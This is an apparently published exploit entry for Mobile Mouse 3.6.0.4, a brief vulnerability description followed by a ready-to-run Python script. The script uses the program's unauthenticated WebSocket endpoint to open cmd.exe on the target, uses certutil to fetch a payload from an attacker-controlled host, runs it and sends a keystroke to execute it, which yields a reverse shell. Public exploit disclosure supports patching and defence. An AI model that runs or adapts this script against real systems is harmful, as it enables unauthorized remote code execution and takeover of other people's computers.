# Exploit Title: Mobile Mouse 3.6.0.4 Unauthenticated Remote Code Execution
via WebSocket Command Injection
# Date: 06/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 (Build 19044)


'''
Mobile Mouse 3.6.0.4 contains a critical unauthenticated remote code
execution vulnerability through its WebSocket interface. Notably, this
exploit bypasses all authentication mechanisms, including when the user has
set a password for the TCP interface. The WebSocket endpoint does not
enforce any authentication, allowing an attacker to send malicious
WebSocket frames remotely and execute arbitrary commands on the target
system with the privileges of the Mobile Mouse service.
'''


#!/usr/bin/env python3

import asyncio
import websockets
from time import sleep

target_ip = "192.168.8.105"
port = 35913 # default port
uri = f"ws://{target_ip}:{port}"
lhost = "192.168.8.100"
payload = "shell.exe"

async def exploit():
    async with websockets.connect(uri) as ws:
        print("[+] Connected")

        cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
        await ws.send(cmd)
        sleep(3)

        command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f
http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe &
C:\\Windows\\Temp\\payload.exe\x1e\x04"
        await ws.send(command_payload)

        print("[+] reverse shell payload sent")

        execute = "KEY\x1e-1\x1eENTER\x1e\x04"
        await ws.send(execute)

        print("[+] Payload executed, check your listener!")

asyncio.run(exploit())